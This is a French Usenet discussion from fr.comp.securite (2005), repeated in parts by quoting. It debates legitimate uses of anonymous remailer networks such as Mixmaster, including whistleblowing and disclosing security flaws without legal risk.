De très vilaines choses évidement, pas juste un petit détournement de
fond de temps en temps mais, par exemple, le blanchiment d'argent de la
mafia.
--
"En amour, on plaît plutôt par d'agréables défauts que par des qualités
essentielles ; les grandes vertus sont des pièces d'or, dont on fait
moins usage que de la monnaie"
Ninon de Lenclos
Xavier nous disait récement dans fr.comp.securite <news:1gth8l4.1ayixtsgubi80N% :
Cedric Blancher wrote:
C'est aussi le cas de Mixmaster en ce qui concerne le mail.
Question sérieuse : ce résau peut-il servir des fins légitimes ?
En plus des éternels opposants chinois, il peut être utilisé pour avertir la presse que la société machin, pour laquelle on travail, fait de vilaines choses[1], le tout sans craindre d'être foutu à la porte ou pire. En fait en prenant le temps d'y penser on doit pouvoir trouver des dizaines d'utilisations légitimes, mais toutes sont exceptionnelles. D'un point de vue légitime, l'interêt du réseau est donc ponctuel, mais comme il peut se montrer nécessaire à tout moment, il faut qu'il existe en permanence.
[1] De très vilaines choses évidement, pas juste un petit détournement de fond de temps en temps mais, par exemple, le blanchiment d'argent de la mafia. -- "En amour, on plaît plutôt par d'agréables défauts que par des qualités essentielles ; les grandes vertus sont des pièces d'or, dont on fait moins usage que de la monnaie" Ninon de Lenclos
Cedric Blancher
Le Tue, 15 Mar 2005 18:48:35 +0000, Stephane Catteau a écrit :
En plus des éternels opposants chinois, il peut être utilisé pour avertir la presse que la société machin, pour laquelle on travail, fait de vilaines choses[1], le tout sans craindre d'être foutu à la porte ou pire.
Ou signaler une faille sans risquer le procès...
-- Chuis même un assassin un meurtier poursuis par les poulets depuis un bon bout ! Y a qu'a voir dans GTA2 comment ils me poursuivent ! Obligé de me planquer sur le toît des imeubles après ! -+- Pip99 in GPJ : Ahhahahaha, et après, JE MANGE LES POULETS -+-
Le Tue, 15 Mar 2005 18:48:35 +0000, Stephane Catteau a écrit :
En plus des éternels opposants chinois, il peut être utilisé pour
avertir la presse que la société machin, pour laquelle on travail, fait
de vilaines choses[1], le tout sans craindre d'être foutu à la porte ou
pire.
Ou signaler une faille sans risquer le procès...
--
Chuis même un assassin un meurtier poursuis par les poulets depuis un
bon bout ! Y a qu'a voir dans GTA2 comment ils me poursuivent ! Obligé
de me planquer sur le toît des imeubles après !
-+- Pip99 in GPJ : Ahhahahaha, et après, JE MANGE LES POULETS -+-
Le Tue, 15 Mar 2005 18:48:35 +0000, Stephane Catteau a écrit :
En plus des éternels opposants chinois, il peut être utilisé pour avertir la presse que la société machin, pour laquelle on travail, fait de vilaines choses[1], le tout sans craindre d'être foutu à la porte ou pire.
Ou signaler une faille sans risquer le procès...
-- Chuis même un assassin un meurtier poursuis par les poulets depuis un bon bout ! Y a qu'a voir dans GTA2 comment ils me poursuivent ! Obligé de me planquer sur le toît des imeubles après ! -+- Pip99 in GPJ : Ahhahahaha, et après, JE MANGE LES POULETS -+-
